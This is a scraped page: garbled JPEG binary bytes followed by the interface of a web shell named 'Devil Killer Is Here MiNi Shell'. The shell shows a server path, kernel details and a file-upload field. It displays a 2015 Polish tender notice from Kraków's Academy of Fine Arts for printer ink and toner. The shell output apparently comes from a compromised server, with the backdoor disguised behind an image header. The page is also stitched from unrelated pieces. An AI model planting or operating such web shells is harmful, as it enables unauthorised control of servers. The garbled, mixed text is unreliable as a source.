JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150902/227478-N-2015.html

<p class="kh_header"><b>Kraków: Dostawa materiałów  eksploatacyjnych  dla Akademii Sztuk Pięknych  im. Jana Matejki  w Krakowie</b><br>
<b>Numer ogłoszenia: 227478 - 2015; data zamieszczenia: 02.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Jana Matejki w Krakowie , Plac Matejki 13, 31-157 Kraków, woj. małopolskie, tel. 12 2992041, faks 12 4226566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów  eksploatacyjnych  dla Akademii Sztuk Pięknych  im. Jana Matejki  w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje sukcesywną dostawę materiałów eksploatacyjnych - tuszy  i  tonerów do drukarek wymienionych  w załączniku nr 1 do specyfikacji (stanowić on będzie jednocześnie załącznik do umowy), w którym wskazano rodzaj sprzętu oraz  przewidywane  roczne  zapotrzebowanie  ilościowe. 
a.  Zamawiający przewiduje, zgodnie z prawem opcji (art. 34 ust. 5 ustawy), możliwość zwiększenia dostaw, co uzależnione będzie potrzebami zamawiającego (np. zakup nowych urządzeń  drukujących, do których niezbędne będą materiały eksploatacyjne                         objęte zamówieniem, zwiększenie zadań Zamawiającego mających  wpływ na zwiększenie zużycia materiałów eksploatacyjnych itp.) z zastrzeżeniem, iż mogą być zrealizowane w wymiarze nie większym niż o 20 % w stosunku do całości zamówienia. Dostawy objęte opcją, w przypadku ich uruchomienia, będą realizowane na ustalonych dla zamówienia zasadach wynikających z niniejszej specyfikacji i rozliczane  w cenach przyjętych z oferty.  Niewykorzystanie dostaw objętych opcją nie rodzi  u Wykonawcy żadnych roszczeń. 
b.  Realizacja dostaw będzie realizowana sukcesywnie, w ciągu maksymalnie  2 dni roboczych od przesłanego faksem, przez pracownika Działu Administracyjno-Gospodarczego, zgłoszenia zapotrzebowania Zamawiającego określającego asortyment  i ilość oraz miejsce dostawy (wskazaną siedzibę Zamawiającego) każdej partii zamówienia. 
c. wszystkie  materiały eksploatacyjne zaoferowane i dostarczane przez Wykonawcę muszą być fabrycznie nowe, nieużytkowane wcześniej i nie regenerowane. Zamawiający nie dopuszcza oferowania materiałów regenerowanych i podrabianych.
d.  Szczegółowe wymagania:
-  Zamawiający wymaga oferowania produktów oryginalnych (przez materiał oryginalny Zamawiający rozumie tylko i wyłącznie produkt producenta urządzenia, do którego przeznaczony jest ten materiał). Zamawiający dopuszcza jednocześnie materiały równoważne, przez które rozumie wszelkie produkty do danego urządzenia nie wyprodukowane przez producenta tego urządzenia, o parametrach eksploatacyjnych (pojemność, wydajność, jakość wydruku) tożsamych bądź lepszych do materiałów oryginalnych oraz kompatybilne z urządzeniami, w których mają być używane (materiały kompatybilne - to produkty innego producenta urządzeń drukujących, które dzięki oparciu urządzeń o te same czy podobne mechanizmy, można wykorzystać również w naszym urządzeniu /Zamawiający zastrzega, że materiały kompatybilne muszą być wyposażone w zgodny z oryginalnym,  elektroniczny chip odpowiadający  m. in. za identyfikację zasobnika przez drukarkę i za monitoring poziomu atramentu/;
- Cena materiału równoważnego nie może być wyższa od ceny materiału oryginalnego. 
- Wszystkie tusze i tonery winny posiadać oryginalne, fabrycznie zamknięte, zewnętrzne  opakowanie zabezpieczone  przed możliwością naruszenia tego opakowania. Dodatkowo powinny być fabrycznie zabezpieczone opakowaniem wewnętrznym bezpośrednio chroniącym kasetę z tonerem bądź cartridge  z tuszem. Każda kaseta                           i cartridge powinny być wyposażone   w zabezpieczenia umożliwiające rozpoznanie czy były wcześniej otwierane /używane,
-  wszystkie oryginalne opakowania producentów materiałów eksploatacyjnych  winny być oznakowane   i  zawierać informacje (co najmniej) w zakresie nazwy producenta tonera/tuszu; nazwy tonera/tuszu; typu i modelu urządzenia/ urządzeń, dla którego/-ych dany toner/tusz jest   przeznaczony,  
e.  Stosowanie materiałów równoważnych nie może powodować uszkodzeń, awarii eksploatowanego przez Zamawiającego sprzętu. Wykonawca jest odpowiedzialny za uszkodzenia sprzętu spowodowane używaniem zaoferowanych materiałów równoważnych. W przypadku uszkodzenia urządzenia, którego przyczyną będzie użycie dostarczanych materiałów eksploatacyjnych innych niż pochodzące od producenta sprzętu, Wykonawca zobowiązany jest do zwrotu kosztów naprawy urządzenia na podstawie ekspertyzy wystawionej przez autoryzowany serwis producenta sprzętu i wykonanej w ww. serwisie. Koszty takiej ekspertyzy obciążają Wykonawcę. 
f.   Dostarczane materiały eksploatacyjne nie mogą powodować utraty praw gwarancji producenta urządzenia, do którego są przeznaczone.  W przypadku uszkodzenia urządzenia będącego na gwarancji, którego przyczyną będzie użycie dostarczonych materiałów równoważnych co jednocześnie spowoduje utratę gwarancji producenta danego urządzenia, Wykonawca będzie zobowiązany w drodze pisemnej umowy, do przejęcia obowiązków gwaranta na pozostały okres gwarancji oraz zwrotu kosztów naprawy urządzenia przez autoryzowany serwis. W przypadku, jeśli czas naprawy urządzenia, uszkodzonego w związku z eksploatacją materiałów równoważnych, przekroczy 72 godziny od momentu zgłoszenia, Wykonawca będzie zobowiązany do nieodpłatnego dostarczenia na czas naprawy innego urządzenia  o takich samych parametrach.  
    Jeśli bezpośrednią przyczyną awarii urządzenia będzie zastosowanie przez Zamawiającego dostarczonych przez Wykonawcę materiałów równoważnych,  a naprawa nie przywróci pełnej użyteczności urządzenia - Wykonawca dokona nieodpłatnej wymiany uszkodzonego urządzenia na urządzenie sprawne o parametrach nie gorszych od uszkodzonego.
g.	Jeżeli Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczanego zamiennika niekorzystnie odbiega od parametrów materiałów oryginalnych lub jeśli produkt nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, Wykonawca, na żądanie Zamawiającego, jest zobowiązany wymienić ten materiał  oryginalny w cenie materiału równoważnego w przeciągu 48 godzin (w dni robocze) od momentu zgłoszenia. Wymiana nastąpi w siedzibie Zamawiającego na koszt i ryzyko Wykonawcy.
h. Zamawiający  ponadto wymaga:  
     -  zapewnienia, nie krótszego niż 12 miesięcy okresu gwarancji jakości,  licząc od  daty ich dostawy do Zamawiającego
- odbioru od Zamawiającego zużytych kaset po tonerach i cartridge, oraz przedłożenia Karty odbioru odpadu potwierdzającej przekazanie, przedsiębiorcy posiadającemu zezwolenie na zbieranie odpadów, przez Zamawiającego, zużytych materiałów eksploatacyjnych

2.	Wymagania dotyczące dostaw
a.	Wykonawca musi zapewnić załadunek, transport i rozładunek dostarczonych tuszy                       i tonerów
b.	Wykaz adresów Zamawiającego, do których będą realizowane dostawy materiałów eksploatacyjnych objętych przedmiotem zamówienia:
a)	Kraków, Plac Jana Matejki 13
b)	Kraków, ul. Smoleńsk 9
c)	Kraków, ul. Piłsudskiego 21
d)	Kraków, ul. Piłsudskiego 38 
e)	Kraków, ul. Humberta 3
f)	Kraków, ul. Masarska 14
g)	Kraków, ul. Lea 27/29
h)	Kraków, ul. Karmelicka 16
i)	Kraków, Plac Matejki 4.

        W przypadku zmiany jakiegokolwiek adresu, Zamawiający zastrzega możliwość zmiany wskazanego adresu na inny zlokalizowany w obrębie miasta Krakowa. Zmiana siedzib wymienionych powyżej nie powoduje konieczności sporządzania aneksu a jedynie konieczność poinformowania Wykonawcy na piśmie, z co najmniej trzydniowym wyprzedzeniem.
c.	Dostawy będą realizowane w godzinach pracy Zamawiającego tj. 7:30-15:30, do wskazanego każdorazowo przez Zamawiającego miejsca (adresu). 
d.	Zamawiający zastrzega możliwość dostaw pilnych, które muszą być zrealizowane do 24 godzin od daty telefonicznego złożenia zamówienia, potwierdzonego faksem.  

3.	Zamawiający dopuszcza złożenie oferty równoważnej:
1)	   W przypadku gdy Zamawiający określił przedmiot zamówienia wskazując producenta, znaki towarowe, patenty czy inne prawa zastrzeżone lub wyłączne bądź  pochodzenie, Zamawiający dopuszcza składanie oferty równoważnej pod względem funkcjonalnym oraz o parametrach techniczno- użytkowych nie gorszych niż te podane w opisie przedmiotu zamówienia, zgodnie z zasadami określonymi w art. 30 ust. 5 ustawy Prawo zamówień publicznych. 
2)	W przypadku złożenia oferty zawierającej zastosowanie rozwiązań równoważnych do  opisywanych przez Zamawiającego, obowiązek udowodnienia ich równoważności                z wymaganiami wskazanymi przez Zamawiającego, leży po stronie Wykonawcy. 
      Za równoważny, pod względem funkcjonalnym, technicznym i użytkowym,                            w stosunku do wskazanych materiałów, Zamawiający uzna takie, oferowane przez Wykonawcę materiały, które posiadają równoważną pod względem technicznym budowę i wyposażenie, a także takie możliwości funkcjonalne i parametry techniczne co zawarte w opisie przedmiotu zamówienia materiały o podanych parametrach referencyjnych. 
3)	Zamawiający dołożył wszelkich starań w celu zachowania warunków konkurencyjności. Jeżeli mimo to w tekście jakiejkolwiek części dokumentacji                   z w postępowaniu pojawiają się nazwy własne, oznaczenia lub parametry wskazujące na konkretny produkt należy zawsze traktować to jako rozwiązania przykładowe                          i można zastosować rozwiązania równoważne na przyjętych wyżej warunkach.
4.	Reklamowanie braków ilościowych i jakościowych dostarczonej partii materiałów odbywać się będzie drogą elektroniczną lub faksem.
5.	Zamawiający  nie dopuszcza  możliwości składania ofert częściowych ani ofert wariantowych.   
6.	Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w załączniku nr 1   do specyfikacji, zostaną odrzucone..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował lub realizuje co najmniej dwie dostawy na materiały eksploatacyjne do drukarek i kopiarek, każda  o wartości min. 80 tys. zł brutto  (w przypadku zamówień w dalszym ciągu realizowanych suma zrealizowanej wartości umowy musi opiewać na powyższą kwotę), z podaniem ich przedmiotu, dat wykonania   i podmiotów, na rzecz których dostawy zostały wykonane oraz załączaniem dowodu, czy zostały wykonane lub są wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne dostawy, których dotyczy obowiązek wskazania w wykazie i załączenia w.w. dowodów, uznaje
się dostawy niezbędne do wykazania spełnienia warunku określonego w Sekcji III.3.2) Zamawiający nie
wymaga wskazania w wykazie dostaw informacji o dostawach niewykonanych lub wykonanych
nienależycie oraz wskazania wszystkich wykonanych dostaw;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 1) każdy Wykonawca
zobowiązany jest złożyć oddzielnie dokumenty określone w Sekcji III.4.2) tiret 2 oraz III.4.4) tiret 1 2) warunki
dotyczące wiedzy i doświadczenia - dokumenty określone w Sekcji III.4.1) tiret 1 powinien złożyć co najmniej
jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 3) oświadczenie o spełnieniu
warunków udziału w postępowaniu określone w Sekcji III.4.1) oraz oświadczenie o nie podleganiu wykluczeniu
określone w Sekcji III.4.2) tiret 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie
zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie. 2. Zgodnie z art. 26 ust. 2b) ustawy Pzp,
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania
zamówienia lub zdolnościach ekonomicznych lub finansowych innych podmiotów, niezależnie od charakteru
prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (przedstawione w formie oryginału lub
notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania
zamówienia (na lub wg. zał. nr 7 do specyfikacji). Zobowiązanie do udostępnienia zasobów w trybie art. 26 ust.
2b ustawy winno być sporządzone zgodnie z zasadami reprezentacji podmiotu, który takie zobowiązanie
podejmuje. W przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych
w art. 26 ust. 2b ustawy, kopie dokumentów stanowiące dowody, muszą być poświadczane za zgodność z
oryginałem przez te podmioty. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b,
odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych
zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 3.W celu oceny, czy Wykonawca będzie
dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz
oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,
Zamawiający żąda złożenia dokumentów dotyczących w szczególności: 1) zakresu dostępnych Wykonawcy
zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę przy
wykonywaniu zamówienia, 3) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 4) zakresu
i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Udostępnienie potencjału dotyczącego wiedzy i
doświadczenia wiąże się z udziałem podmiotu trzeciego przy realizacji zamówienia, np. w formie
podwykonawstwa, konsultacji, doradztwa. 4. Jeżeli Wykonawca, wykazując spełnianie warunków, o których
mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b
ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający wymaga od Wykonawcy
przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w Sekcji III.4.2) 5. Podwykonawcy:
1). Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć
podwykonawcy oraz podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca
powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania
spełniania warunków udziału w postępowaniu, o których mowa w Sekcji III.3. 2). Jeżeli zmiana albo rezygnacja z
podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art.
26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w Sekcji III.3.2),
Wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
6.Dokumenty podmiotów zagranicznych: 1) jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym
wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji
III.4.3.1) tiret 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby
uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo
organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju,
w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, 2) dokument, o którym
mowa Sekcji III.4.3.1) tiret 1 lub zastępujący go dokument, o którym mowa w pkt 1, powinny być wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 3) w przypadku wątpliwości co do treści
dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca
zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o
udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 7.Wartości pieniężne wskazane w
dokumentach mających na celu wykazanie spełniania przez wykonawców warunków udziału w postępowaniu
dotyczących posiadania wiedzy i doświadczenia, sytuacji ekonomicznej i finansowej, podane w walutach obcych,
wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia opublikowania ogłoszenia o
niniejszym postępowaniu w Biuletynie Zamówień Publicznych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - aspekty środowiskowe - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
